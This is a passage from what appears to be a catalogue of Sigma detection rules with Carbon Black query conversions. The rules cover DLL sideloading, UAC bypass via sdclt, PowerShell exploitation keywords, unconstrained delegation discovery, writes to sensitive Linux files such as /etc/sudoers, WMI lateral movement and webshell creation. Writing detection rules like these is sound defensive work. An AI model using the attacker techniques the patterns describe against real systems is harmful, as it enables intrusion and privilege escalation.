    product: windows
detection:
    selection:
        ImageLoaded|endswith: '\SolidPDFCreator.dll'
    filter_main_path:
        Image|endswith: '\SolidPDFCreator.exe'
        ImageLoaded|startswith:
            - 'C:\Program Files (x86)\SolidDocuments\SolidPDFCreator\'
            - 'C:\Program Files\SolidDocuments\SolidPDFCreator\'
    condition: selection and not 1 of filter_main_*
falsepositives:
    - Unknown
level: medium

Convert to SIEM query

medium Strong Medium FP

Potential Suspicious Activity Using SeCEdit

Detects potential suspicious behaviour using secedit.exe. Such as exporting or modifying the security policy

status test author Janantha Marasinghe ATT&CK sub-technique id c2c76b77-32be-4d1f-82c9-7e544bdfe0eb

carbon_black query

(Image:\\secedit.exe OR OriginalFileName:SeCEdit) ((CommandLine:\/export* CommandLine:\/cfg*) OR (CommandLine:\/configure* CommandLine:\/db*))

view Sigma YAML

title: Potential Suspicious Activity Using SeCEdit
id: c2c76b77-32be-4d1f-82c9-7e544bdfe0eb
status: test
description: Detects potential suspicious behaviour using secedit.exe. Such as exporting or modifying the security policy
references:
    - https://blueteamops.medium.com/secedit-and-i-know-it-595056dee53d
    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/secedit
author: Janantha Marasinghe
date: 2022-11-18
modified: 2022-12-30
tags:
    - attack.collection
    - attack.discovery
    - attack.persistence
    - attack.credential-access
    - attack.privilege-escalation
    - attack.execution
    - attack.stealth
    - attack.defense-impairment
    - attack.t1685.001
    - attack.t1547.001
    - attack.t1505.005
    - attack.t1556.002
    - attack.t1685
    - attack.t1574.007
    - attack.t1564.002
    - attack.t1546.008
    - attack.t1546.007
    - attack.t1547.014
    - attack.t1547.010
    - attack.t1547.002
    - attack.t1557
    - attack.t1082
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Image|endswith: '\secedit.exe'
        - OriginalFileName: 'SeCEdit'
    selection_flags_discovery:
        CommandLine|contains|all:
            - '/export'
            - '/cfg'
    selection_flags_configure:
        CommandLine|contains|all:
            - '/configure'
            - '/db'
    # filter:
    #     SubjectUserName|endswith: '$'  SubjectUserName is from event ID 4719 in the Windows Security log
    condition: selection_img and (1 of selection_flags_*)
falsepositives:
    - Legitimate administrative use
level: medium

Convert to SIEM query

medium Strong Medium FP

Potential Suspicious Browser Launch From Document Reader Process

Detects when a browser process or browser tab is launched from an application that handles document files such as Adobe, Microsoft Office, etc. And connects to a web application over http(s), this could indicate a possible phishing attempt.

status test author Joseph Kamau ATT&CK sub-technique id 1193d960-2369-499f-a158-7b50a31df682

carbon_black query

((ParentImage:Acrobat\ Reader* OR ParentImage:Microsoft\ Office* OR ParentImage:PDF\ Reader*) (Image:\\brave.exe OR Image:\\chrome.exe OR Image:\\firefox.exe OR Image:\\msedge.exe OR Image:\\opera.exe OR Image:\\maxthon.exe OR Image:\\seamonkey.exe OR Image:\\vivaldi.exe) CommandLine:http*) (-CommandLine:https\:\/\/go.microsoft.com\/fwlink\/*) (-(CommandLine:http\:\/\/ad.foxitsoftware.com\/adlog.php** OR CommandLine:https\:\/\/globe\-map.foxitservice.com\/go.php*do=redirect*))

view Sigma YAML

title: Potential Suspicious Browser Launch From Document Reader Process
id: 1193d960-2369-499f-a158-7b50a31df682
status: test
description: |
    Detects when a browser process or browser tab is launched from an application that handles document files such as Adobe, Microsoft Office, etc. And connects to a web application over http(s), this could indicate a possible phishing attempt.
references:
    - https://app.any.run/tasks/69c5abaa-92ad-45ba-8c53-c11e23e05d04/ # PDF Document
    - https://app.any.run/tasks/64043a79-165f-4052-bcba-e6e49f847ec1/ # Office Document
author: Joseph Kamau
date: 2024-05-27
modified: 2025-10-07
tags:
    - attack.execution
    - attack.t1204.002
logsource:
    product: windows
    category: process_creation
detection:
    selection:
        ParentImage|contains:
            - 'Acrobat Reader'
            - 'Microsoft Office'
            - 'PDF Reader'
        Image|endswith:
            - '\brave.exe'
            - '\chrome.exe'
            - '\firefox.exe'
            - '\msedge.exe'
            - '\opera.exe'
            - '\maxthon.exe'
            - '\seamonkey.exe'
            - '\vivaldi.exe'
        CommandLine|contains: 'http'
    filter_main_microsoft_help:
        CommandLine|contains: 'https://go.microsoft.com/fwlink/'
    filter_optional_foxit:
        CommandLine|contains:
            - 'http://ad.foxitsoftware.com/adlog.php?'
            - 'https://globe-map.foxitservice.com/go.php?do=redirect'
    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*
falsepositives:
    - Unlikely in most cases, further investigation should be done in the commandline of the browser process to determine the context of the URL accessed.
level: medium

Convert to SIEM query

medium Strong Medium FP

Potential Suspicious Change To Sensitive/Critical Files

Detects changes of sensitive and critical files. Monitors files that you don't expect to change without planning on Linux system. These files include, but are not limited to, system configuration files, authentication files, and critical application files. Attackers often target these files to maintain persistence, escalate privileges, or disrupt system operations.

status test author @d4ns4n_ (Wuerth-Phoenix) ATT&CK sub-technique id 86157017-c2b1-4d4a-8c33-93b8e67e4af4

carbon_black query

(((Image:\/cat OR Image:\/echo OR Image:\/grep OR Image:\/head OR Image:\/more OR Image:\/tail) CommandLine:>*) OR (Image:\/emacs OR Image:\/nano OR Image:\/sed OR Image:\/vi OR Image:\/vim)) (CommandLine:\/bin\/login* OR CommandLine:\/bin\/passwd* OR CommandLine:\/boot\/* OR CommandLine:\/etc\/*.conf* OR CommandLine:\/etc\/cron.* OR CommandLine:\/etc\/crontab* OR CommandLine:\/etc\/hosts* OR CommandLine:\/etc\/init.d* OR CommandLine:\/etc\/sudoers* OR CommandLine:\/opt\/bin\/* OR CommandLine:\/sbin* OR CommandLine:\/usr\/bin\/* OR CommandLine:\/usr\/local\/bin\/*) (-(Image:\/bin\/sed (CommandLine:sed\ \-i\ \/\^* OR CommandLine:sed\ \-ne\ s\/\^*) CommandLine:\/etc\/mdadm\/mdadm.conf))

view Sigma YAML

title: Potential Suspicious Change To Sensitive/Critical Files
id: 86157017-c2b1-4d4a-8c33-93b8e67e4af4
status: test
description: |
    Detects changes of sensitive and critical files. Monitors files that you don't expect to change without planning on Linux system.
    These files include, but are not limited to, system configuration files, authentication files, and critical application files.
    Attackers often target these files to maintain persistence, escalate privileges, or disrupt system operations.
references:
    - https://learn.microsoft.com/en-us/azure/defender-for-cloud/file-integrity-monitoring-overview#which-files-should-i-monitor
author: '@d4ns4n_ (Wuerth-Phoenix)'
date: 2023-05-30
modified: 2026-03-18
tags:
    - attack.impact
    - attack.t1565.001
logsource:
    category: process_creation
    product: linux
detection:
    selection_img_1:
        Image|endswith:
            - '/cat'
            - '/echo'
            - '/grep'
            - '/head'
            - '/more'
            - '/tail'
        CommandLine|contains: '>'
    selection_img_2:
        Image|endswith:
            - '/emacs'
            - '/nano'
            - '/sed'
            - '/vi'
            - '/vim'
    selection_paths:
        CommandLine|contains:
            - '/bin/login'
            - '/bin/passwd'
            - '/boot/'
            - '/etc/*.conf'
            - '/etc/cron.' # Covers different cron config files "daily", "hourly", etc.
            - '/etc/crontab'
            - '/etc/hosts'
            - '/etc/init.d'
            - '/etc/sudoers'
            - '/opt/bin/'
            - '/sbin' # Covers: '/opt/sbin', '/usr/local/sbin/', '/usr/sbin/'
            - '/usr/bin/'
            - '/usr/local/bin/'
    filter_main_mdadm.conf:
        Image|endswith: '/bin/sed'
        CommandLine|startswith:
            - 'sed -i /^*'
            - 'sed -ne s/^'
        CommandLine|endswith: '/etc/mdadm/mdadm.conf'
    condition: 1 of selection_img_* and selection_paths and not 1 of filter_main_*
falsepositives:
    - Some false positives are to be expected on user or administrator machines. Apply additional filters as needed.
level: medium

Convert to SIEM query

medium Moderate High FP

Potential Suspicious PowerShell Keywords

Detects potentially suspicious keywords that could indicate the use of a PowerShell exploitation framework

status test author Florian Roth (Nextron Systems), Perez Diego (@darkquassar), Tuan Le (NCSGroup) ATT&CK sub-technique id 1f49f2ab-26bc-48b3-96cc-dcffbc93eadf

carbon_black query

ScriptBlockText:System.Reflection.Assembly.Load\($* OR ScriptBlockText:\[System.Reflection.Assembly\]\:\:Load\($* OR ScriptBlockText:\[Reflection.Assembly\]\:\:Load\($* OR ScriptBlockText:System.Reflection.AssemblyName* OR ScriptBlockText:Reflection.Emit.AssemblyBuilderAccess* OR ScriptBlockText:Reflection.Emit.CustomAttributeBuilder* OR ScriptBlockText:Runtime.InteropServices.UnmanagedType* OR ScriptBlockText:Runtime.InteropServices.DllImportAttribute* OR ScriptBlockText:SuspendThread* OR ScriptBlockText:rundll32*

view Sigma YAML

title: Potential Suspicious PowerShell Keywords
id: 1f49f2ab-26bc-48b3-96cc-dcffbc93eadf
status: test
description: Detects potentially suspicious keywords that could indicate the use of a PowerShell exploitation framework
references:
    - https://posts.specterops.io/entering-a-covenant-net-command-and-control-e11038bcf462
    - https://github.com/PowerShellMafia/PowerSploit/blob/d943001a7defb5e0d1657085a77a0e78609be58f/CodeExecution/Invoke-ReflectivePEInjection.ps1
    - https://github.com/hlldz/Phant0m/blob/30c2935d8cf4aafda17ee2fab7cd0c4aa9a607c2/old/Invoke-Phant0m.ps1
    - https://gist.github.com/MHaggis/0dbe00ad401daa7137c81c99c268cfb7
author: Florian Roth (Nextron Systems), Perez Diego (@darkquassar), Tuan Le (NCSGroup)
date: 2019-02-11
modified: 2023-04-21
tags:
    - attack.execution
    - attack.t1059.001
logsource:
    product: windows
    category: ps_script
    definition: 'Requirements: Script Block Logging must be enabled'
detection:
    selection:
        ScriptBlockText|contains:
            - 'System.Reflection.Assembly.Load($'
            - '[System.Reflection.Assembly]::Load($'
            - '[Reflection.Assembly]::Load($'
            - 'System.Reflection.AssemblyName'
            - 'Reflection.Emit.AssemblyBuilderAccess'
            - 'Reflection.Emit.CustomAttributeBuilder'
            - 'Runtime.InteropServices.UnmanagedType'
            - 'Runtime.InteropServices.DllImportAttribute'
            - 'SuspendThread'
            - 'rundll32'
            # - 'FromBase64'
            # - 'Invoke-WMIMethod' # Prone to FP
            # - 'http://127.0.0.1' # Prone to FP
    condition: selection
falsepositives:
    - Unknown
level: medium

Convert to SIEM query

medium Moderate High FP

Potential Suspicious PowerShell Module File Created

Detects the creation of a new PowerShell module in the first folder of the module directory structure "\WindowsPowerShell\Modules\malware\malware.psm1". This is somewhat an uncommon practice as legitimate modules often includes a version folder.

status test author Nasreddine Bencherchali (Nextron Systems) ATT&CK tactic-only id e8a52bbd-bced-459f-bd93-64db45ce7657

carbon_black query

TargetFilename:\\WindowsPowerShell\\Modules\\*\\.ps OR TargetFilename:\\WindowsPowerShell\\Modules\\*\\.dll

view Sigma YAML

title: Potential Suspicious PowerShell Module File Created
id: e8a52bbd-bced-459f-bd93-64db45ce7657
status: test
description: Detects the creation of a new PowerShell module in the first folder of the module directory structure "\WindowsPowerShell\Modules\malware\malware.psm1". This is somewhat an uncommon practice as legitimate modules often includes a version folder.
references:
    - Internal Research
    - https://learn.microsoft.com/en-us/powershell/scripting/developer/module/understanding-a-windows-powershell-module?view=powershell-7.3
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-05-09
tags:
    - attack.persistence
logsource:
    category: file_event
    product: windows
detection:
    selection:
        TargetFilename|endswith:
            # Note: Don't include PowerShell 7 as it has default modules that don't follow this logic
            - '\\WindowsPowerShell\\Modules\\*\.ps'
            - '\\WindowsPowerShell\\Modules\\*\.dll'
    condition: selection
falsepositives:
    - False positive rate will vary depending on the environments. Additional filters might be required to make this logic usable in production.
level: medium

Convert to SIEM query

medium Strong Medium FP

Potential Suspicious Registry File Imported Via Reg.EXE

Detects the import of '.reg' files from suspicious paths using the 'reg.exe' utility

status test author frack113, Nasreddine Bencherchali ATT&CK technique id 62e0298b-e994-4189-bc87-bc699aa62d97

carbon_black query

(Image:\\reg.exe OR OriginalFileName:reg.exe) CommandLine:\ import\ * (CommandLine:C\:\\Users\\* OR CommandLine:%temp%* OR CommandLine:%tmp%* OR CommandLine:%appdata%* OR CommandLine:\\AppData\\Local\\Temp\\* OR CommandLine:C\:\\Windows\\Temp\\* OR CommandLine:C\:\\ProgramData\\*)

view Sigma YAML

title: Potential Suspicious Registry File Imported Via Reg.EXE
id: 62e0298b-e994-4189-bc87-bc699aa62d97
related:
    - id: 73bba97f-a82d-42ce-b315-9182e76c57b1
      type: derived
status: test
description: Detects the import of '.reg' files from suspicious paths using the 'reg.exe' utility
references:
    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/reg-import
author: frack113, Nasreddine Bencherchali
date: 2022-08-01
modified: 2023-02-05
tags:
    - attack.persistence
    - attack.defense-impairment
    - attack.t1112
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Image|endswith: '\reg.exe'
        - OriginalFileName: 'reg.exe'
    selection_cli:
        CommandLine|contains: ' import '
    selection_paths:
        CommandLine|contains:
            - 'C:\Users\'
            - '%temp%'
            - '%tmp%'
            - '%appdata%'
            - '\AppData\Local\Temp\'
            - 'C:\Windows\Temp\'
            - 'C:\ProgramData\'
    condition: all of selection_*
falsepositives:
    - Legitimate import of keys
level: medium

Convert to SIEM query

medium Strong High FP

Potential Suspicious Windows Feature Enabled

Detects usage of the built-in PowerShell cmdlet "Enable-WindowsOptionalFeature" used as a Deployment Image Servicing and Management tool. Similar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images

status test author frack113 ATT&CK tactic-only id 55c925c1-7195-426b-a136-a9396800e29b

carbon_black query

(ScriptBlockText:Enable\-WindowsOptionalFeature* ScriptBlockText:\-Online* ScriptBlockText:\-FeatureName*) (ScriptBlockText:TelnetServer* OR ScriptBlockText:Internet\-Explorer\-Optional\-amd64* OR ScriptBlockText:TFTP* OR ScriptBlockText:SMB1Protocol* OR ScriptBlockText:Client\-ProjFS* OR ScriptBlockText:Microsoft\-Windows\-Subsystem\-Linux*)

view Sigma YAML

title: Potential Suspicious Windows Feature Enabled
id: 55c925c1-7195-426b-a136-a9396800e29b
related:
    - id: c740d4cf-a1e9-41de-bb16-8a46a4f57918
      type: similar
status: test
description: |
    Detects usage of the built-in PowerShell cmdlet "Enable-WindowsOptionalFeature" used as a Deployment Image Servicing and Management tool.
    Similar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images
references:
    - https://learn.microsoft.com/en-us/powershell/module/dism/enable-windowsoptionalfeature?view=windowsserver2022-ps
    - https://learn.microsoft.com/en-us/windows/win32/projfs/enabling-windows-projected-file-system
    - https://learn.microsoft.com/en-us/windows/wsl/install-on-server
author: frack113
date: 2022-09-10
modified: 2022-12-29
tags:
    - attack.stealth
logsource:
    product: windows
    category: ps_script
    definition: 'Requirements: Script Block Logging must be enabled'
detection:
    selection_cmd:
        ScriptBlockText|contains|all:
            - 'Enable-WindowsOptionalFeature'
            - '-Online'
            - '-FeatureName'
    selection_feature:
        # Add any insecure/unusual windows features to your env
        ScriptBlockText|contains:
            - 'TelnetServer'
            - 'Internet-Explorer-Optional-amd64'
            - 'TFTP'
            - 'SMB1Protocol'
            - 'Client-ProjFS'
            - 'Microsoft-Windows-Subsystem-Linux'
    condition: all of selection_*
falsepositives:
    - Legitimate usage of the features listed in the rule.
level: medium

Convert to SIEM query

medium Strong High FP

Potential Suspicious Windows Feature Enabled - ProcCreation

Detects usage of the built-in PowerShell cmdlet "Enable-WindowsOptionalFeature" used as a Deployment Image Servicing and Management tool. Similar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images

status test author Nasreddine Bencherchali (Nextron Systems) ATT&CK tactic-only id c740d4cf-a1e9-41de-bb16-8a46a4f57918

carbon_black query

(CommandLine:Enable\-WindowsOptionalFeature* CommandLine:\-Online* CommandLine:\-FeatureName*) (CommandLine:TelnetServer* OR CommandLine:Internet\-Explorer\-Optional\-amd64* OR CommandLine:TFTP* OR CommandLine:SMB1Protocol* OR CommandLine:Client\-ProjFS* OR CommandLine:Microsoft\-Windows\-Subsystem\-Linux*)

view Sigma YAML

title: Potential Suspicious Windows Feature Enabled - ProcCreation
id: c740d4cf-a1e9-41de-bb16-8a46a4f57918
related:
    - id: 55c925c1-7195-426b-a136-a9396800e29b
      type: similar
status: test
description: |
    Detects usage of the built-in PowerShell cmdlet "Enable-WindowsOptionalFeature" used as a Deployment Image Servicing and Management tool.
    Similar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images
references:
    - https://learn.microsoft.com/en-us/powershell/module/dism/enable-windowsoptionalfeature?view=windowsserver2022-ps
    - https://learn.microsoft.com/en-us/windows/win32/projfs/enabling-windows-projected-file-system
    - https://learn.microsoft.com/en-us/windows/wsl/install-on-server
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-12-29
tags:
    - attack.stealth
logsource:
    category: process_creation
    product: windows
detection:
    selection_cmd:
        CommandLine|contains|all:
            - 'Enable-WindowsOptionalFeature'
            - '-Online'
            - '-FeatureName'
    selection_feature:
        # Add any insecure/unusual windows features that you don't use in your environment
        CommandLine|contains:
            - 'TelnetServer'
            - 'Internet-Explorer-Optional-amd64'
            - 'TFTP'
            - 'SMB1Protocol'
            - 'Client-ProjFS'
            - 'Microsoft-Windows-Subsystem-Linux'
    condition: all of selection_*
falsepositives:
    - Legitimate usage of the features listed in the rule.
level: medium

Convert to SIEM query

medium Moderate Medium FP

Potential UAC Bypass Via Sdclt.EXE

A General detection for sdclt being spawned as an elevated process. This could be an indicator of sdclt being used for bypass UAC techniques.

status test author Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) ATT&CK sub-technique id 40f9af16-589d-4984-b78d-8c2aec023197

carbon_black query

Image:sdclt.exe (IntegrityLevel:High OR IntegrityLevel:S\-1\-16\-12288)

view Sigma YAML

title: Potential UAC Bypass Via Sdclt.EXE
id: 40f9af16-589d-4984-b78d-8c2aec023197
status: test
description: A General detection for sdclt being spawned as an elevated process. This could be an indicator of sdclt being used for bypass UAC techniques.
references:
    - https://github.com/OTRF/detection-hackathon-apt29/issues/6
    - https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/3.B.2_C36B49B5-DF58-4A34-9FE9-56189B9DEFEA.md
author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
date: 2020-05-02
modified: 2024-12-01
tags:
    - attack.privilege-escalation
    - attack.t1548.002
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: 'sdclt.exe'
        IntegrityLevel:
            - 'High'
            - 'S-1-16-12288' # High
    condition: selection
falsepositives:
    - Unknown
level: medium

Convert to SIEM query

medium Moderate High FP

Potential Unconstrained Delegation Discovery Via Get-ADComputer - ScriptBlock

Detects the use of the "Get-ADComputer" cmdlet in order to identify systems which are configured for unconstrained delegation.

status experimental author frack113 ATT&CK sub-technique id cdfa73b6-3c9d-4bb8-97f8-ddbd8921f5c5

carbon_black query

ScriptBlockText:\-Properties*TrustedForDelegation* OR ScriptBlockText:\-Properties*TrustedToAuthForDelegation* OR ScriptBlockText:\-Properties*msDS\-AllowedToDelegateTo* OR ScriptBlockText:\-Properties*PrincipalsAllowedToDelegateToAccount* OR ScriptBlockText:\-LDAPFilter*\(userAccountControl\:1.2.840.113556.1.4.803\:=524288\)*

view Sigma YAML

title: Potential Unconstrained Delegation Discovery Via Get-ADComputer - ScriptBlock
id: cdfa73b6-3c9d-4bb8-97f8-ddbd8921f5c5
status: experimental
description: Detects the use of the "Get-ADComputer" cmdlet in order to identify systems which are configured for unconstrained delegation.
references:
    - https://pentestlab.blog/2022/03/21/unconstrained-delegation/
    - https://learn.microsoft.com/en-us/powershell/module/activedirectory/get-adcomputer?view=windowsserver2022-ps
author: frack113
date: 2025-03-05
tags:
    - attack.reconnaissance
    - attack.discovery
    - attack.credential-access
    - attack.t1018
    - attack.t1558
    - attack.t1589.002
logsource:
    product: windows
    category: ps_script
    definition: 'Requirements: Script Block Logging must be enable'
detection:
    selection:
        ScriptBlockText|contains:
            - '-Properties*TrustedForDelegation'
            - '-Properties*TrustedToAuthForDelegation'
            - '-Properties*msDS-AllowedToDelegateTo'
            - '-Properties*PrincipalsAllowedToDelegateToAccount'
            - '-LDAPFilter*(userAccountControl:1.2.840.113556.1.4.803:=524288)'
    condition: selection
falsepositives:
    - Legitimate use of the library for administrative activity
level: medium

Convert to SIEM query

medium Moderate High FP

Potential Unquoted Service Path Reconnaissance Via Wmic.EXE

Detects known WMI recon method to look for unquoted service paths using wmic. Often used by pentester and attacker enumeration scripts

status test author Nasreddine Bencherchali (Nextron Systems) ATT&CK technique id 68bcd73b-37ef-49cb-95fc-edc809730be6

carbon_black query

(OriginalFileName:wmic.exe OR Image:\\WMIC.exe) (CommandLine:\ service\ get\ * CommandLine:name,displayname,pathname,startmode*)

view Sigma YAML

title: Potential Unquoted Service Path Reconnaissance Via Wmic.EXE
id: 68bcd73b-37ef-49cb-95fc-edc809730be6
related:
    - id: 09658312-bc27-4a3b-91c5-e49ab9046d1b # PowerShell Variant
      type: similar
    - id: 76f55eaa-d27f-4213-9d45-7b0e4b60bbae
      type: similar
status: test
description: Detects known WMI recon method to look for unquoted service paths using wmic. Often used by pentester and attacker enumeration scripts
references:
    - https://github.com/nccgroup/redsnarf/blob/35949b30106ae543dc6f2bc3f1be10c6d9a8d40e/redsnarf.py
    - https://github.com/S3cur3Th1sSh1t/Creds/blob/eac23d67f7f90c7fc8e3130587d86158c22aa398/PowershellScripts/jaws-enum.ps1
    - https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-06-20
modified: 2023-09-11
tags:
    - attack.execution
    - attack.t1047
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - OriginalFileName: 'wmic.exe'
        - Image|endswith: '\WMIC.exe'
    selection_cli:
        CommandLine|contains|all:
            - ' service get '
            - 'name,displayname,pathname,startmode'
    condition: all of selection*
falsepositives:
    - Unknown
level: medium

Convert to SIEM query

medium Moderate Medium FP

Potential Vivaldi_elf.DLL Sideloading

Detects potential DLL sideloading of "vivaldi_elf.dll"

status test author X__Junior (Nextron Systems) ATT&CK sub-technique id 2092cacb-d77b-4f98-ab0d-32b32f99a054

carbon_black query

ImageLoaded:\\vivaldi_elf.dll (-(Image:\\Vivaldi\\Application\\vivaldi.exe ImageLoaded:\\Vivaldi\\Application\\*))

view Sigma YAML

title: Potential Vivaldi_elf.DLL Sideloading
id: 2092cacb-d77b-4f98-ab0d-32b32f99a054
status: test
description: Detects potential DLL sideloading of "vivaldi_elf.dll"
references:
    - https://research.checkpoint.com/2023/beyond-the-horizon-traveling-the-world-on-camaro-dragons-usb-flash-drives/
author: X__Junior (Nextron Systems)
date: 2023-08-03
tags:
    - attack.persistence
    - attack.privilege-escalation
    - attack.execution
    - attack.stealth
    - attack.t1574.001
logsource:
    category: image_load
    product: windows
detection:
    selection:
        ImageLoaded|endswith: '\vivaldi_elf.dll'
    filter_main_legit_path:
        Image|endswith: '\Vivaldi\Application\vivaldi.exe'
        ImageLoaded|contains: '\Vivaldi\Application\'
    condition: selection and not 1 of filter_main_*
falsepositives:
    - Unknown
level: medium

Convert to SIEM query

medium Strong High FP

Potential WMI Lateral Movement WmiPrvSE Spawned PowerShell

Detects Powershell as a child of the WmiPrvSE process. Which could be a sign of lateral movement via WMI.

status stable author Markus Neis @Karneades ATT&CK sub-technique id 692f0bec-83ba-4d04-af7e-e884a96059b6

carbon_black query

ParentImage:\\WmiPrvSE.exe ((Image:\\powershell.exe OR Image:\\pwsh.exe) OR (OriginalFileName:PowerShell.EXE OR OriginalFileName:pwsh.dll))

view Sigma YAML

title: Potential WMI Lateral Movement WmiPrvSE Spawned PowerShell
id: 692f0bec-83ba-4d04-af7e-e884a96059b6
related:
    - id: 8a582fe2-0882-4b89-a82a-da6b2dc32937
      type: similar
    - id: d21374ff-f574-44a7-9998-4a8c8bf33d7d
      type: similar
status: stable
description: Detects Powershell as a child of the WmiPrvSE process. Which could be a sign of lateral movement via WMI.
references:
    - https://any.run/report/68bc255f9b0db6a0d30a8f2dadfbee3256acfe12497bf93943bc1eab0735e45e/a2385d6f-34f7-403c-90d3-b1f9d2a90a5e
author: Markus Neis @Karneades
date: 2019-04-03
modified: 2023-03-29
tags:
    - attack.execution
    - attack.t1047
    - attack.t1059.001
logsource:
    category: process_creation
    product: windows
detection:
    selection_parent:
        ParentImage|endswith: '\WmiPrvSE.exe'
    selection_img:
        - Image|endswith:
              - '\powershell.exe'
              - '\pwsh.exe'
        - OriginalFileName:
              - 'PowerShell.EXE'
              - 'pwsh.dll'
    condition: all of selection_*
falsepositives:
    - AppvClient
    - CCM
    - WinRM
level: medium

Convert to SIEM query

medium Strong Medium FP

Potential WWlib.DLL Sideloading

Detects potential DLL sideloading of "wwlib.dll"

status test author X__Junior (Nextron Systems) ATT&CK sub-technique id e2e01011-5910-4267-9c3b-4149ed5479cf

carbon_black query

ImageLoaded:\\wwlib.dll (-((Image:C\:\\Program\ Files\ \(x86\)\\Microsoft\ Office\\* OR Image:C\:\\Program\ Files\\Microsoft\ Office\\*) Image:\\winword.exe (ImageLoaded:C\:\\Program\ Files\ \(x86\)\\Microsoft\ Office\\* OR ImageLoaded:C\:\\Program\ Files\\Microsoft\ Office\\*)))

view Sigma YAML

title: Potential WWlib.DLL Sideloading
id: e2e01011-5910-4267-9c3b-4149ed5479cf
status: test
description: Detects potential DLL sideloading of "wwlib.dll"
references:
    - https://twitter.com/WhichbufferArda/status/1658829954182774784
    - https://news.sophos.com/en-us/2022/11/03/family-tree-dll-sideloading-cases-may-be-related/
    - https://securelist.com/apt-luminousmoth/103332/
author: X__Junior (Nextron Systems)
date: 2023-05-18
tags:
    - attack.persistence
    - attack.privilege-escalation
    - attack.execution
    - attack.stealth
    - attack.t1574.001
logsource:
    category: image_load
    product: windows
detection:
    selection:
        ImageLoaded|endswith: '\wwlib.dll'
    filter_main_path:
        Image|startswith:
            - 'C:\Program Files (x86)\Microsoft Office\'
            - 'C:\Program Files\Microsoft Office\'
        Image|endswith: '\winword.exe'
        ImageLoaded|startswith:
            - 'C:\Program Files (x86)\Microsoft Office\'
            - 'C:\Program Files\Microsoft Office\'
    condition: selection and not 1 of filter_main_*
falsepositives:
    - Unknown
level: medium

Convert to SIEM query

medium Strong Medium FP

Potential Wazuh Security Platform DLL Sideloading

Detects potential DLL side loading of DLLs that are part of the Wazuh security platform

status test author X__Junior (Nextron Systems) ATT&CK sub-technique id db77ce78-7e28-4188-9337-cf30e2b3ba9f

carbon_black query

(ImageLoaded:\\libwazuhshared.dll OR ImageLoaded:\\libwinpthread\-1.dll) (-(ImageLoaded:C\:\\Program\ Files\\* OR ImageLoaded:C\:\\Program\ Files\ \(x86\)\\*)) (-((ImageLoaded:\\AppData\\Local\\* OR ImageLoaded:\\ProgramData\\*) ImageLoaded:\\mingw64\\bin\\libwinpthread\-1.dll))

view Sigma YAML

title: Potential Wazuh Security Platform DLL Sideloading
id: db77ce78-7e28-4188-9337-cf30e2b3ba9f
status: test
description: Detects potential DLL side loading of DLLs that are part of the Wazuh security platform
references:
    - https://www.trendmicro.com/en_us/research/23/c/iron-tiger-sysupdate-adds-linux-targeting.html
author: X__Junior (Nextron Systems)
date: 2023-03-13
modified: 2023-05-12
tags:
    - attack.persistence
    - attack.privilege-escalation
    - attack.execution
    - attack.stealth
    - attack.t1574.001
logsource:
    category: image_load
    product: windows
detection:
    selection:
        ImageLoaded|endswith:
            - '\libwazuhshared.dll'
            - '\libwinpthread-1.dll'
    filter_main_generic:
        ImageLoaded|startswith:
            - 'C:\Program Files\'
            - 'C:\Program Files (x86)\'
    filter_optional_mingw64:
        # Note: Many third party apps installed in "AppData" or "ProgramData" and leverage "mingw64" make use of "libwinpthread-1.dll"
        # In production its best to make a list of these apps and replace this filter with a specific one.
        ImageLoaded|contains:
            - '\AppData\Local\'
            - '\ProgramData\'
        ImageLoaded|endswith: '\mingw64\bin\libwinpthread-1.dll'
    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*
falsepositives:
    - Many legitimate applications leverage this DLL. (Visual Studio, JetBrains, Ruby, Anaconda, GithubDesktop, etc.)
level: medium

Convert to SIEM query

medium Strong Medium FP

Potential Webshell Creation On Static Website

Detects the creation of files with certain extensions on a static web site. This can be indicative of potential uploads of a web shell.

status test author Beyu Denis, oscd.community, Tim Shelton, Thurein Oo ATT&CK sub-technique id 39f1f9f2-9636-45de-98f6-a4046aa8e4b9

carbon_black query

((TargetFilename:\\inetpub\\wwwroot\\* (TargetFilename:.ashx* OR TargetFilename:.asp* OR TargetFilename:.ph* OR TargetFilename:.soap*)) OR ((TargetFilename:\\www\\* OR TargetFilename:\\htdocs\\* OR TargetFilename:\\html\\*) TargetFilename:.ph*)) (-((TargetFilename:\\AppData\\Local\\Temp\\* OR TargetFilename:\\Windows\\Temp\\*) OR Image:System OR TargetFilename:\\xampp*))

view Sigma YAML

title: Potential Webshell Creation On Static Website
id: 39f1f9f2-9636-45de-98f6-a4046aa8e4b9
status: test
description: Detects the creation of files with certain extensions on a static web site. This can be indicative of potential uploads of a web shell.
references:
    - PT ESC rule and personal experience
    - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/c95a0a1a2855dc0cd7f7327614545fe30482a636/Upload%20Insecure%20Files/README.md
author: Beyu Denis, oscd.community, Tim Shelton, Thurein Oo
date: 2019-10-22
modified: 2023-10-15
tags:
    - attack.persistence
    - attack.t1505.003
logsource:
    product: windows
    category: file_event
detection:
    selection_wwwroot_path:
        TargetFilename|contains: '\inetpub\wwwroot\'
    selection_wwwroot_ext:
        TargetFilename|contains:
            - '.ashx'
            - '.asp'
            - '.ph'
            - '.soap'
    selection_htdocs_path:
        TargetFilename|contains:
            - '\www\'
            - '\htdocs\'
            - '\html\'
    selection_htdocs_ext:
        TargetFilename|contains: '.ph'
    # selection_tomcat_path:
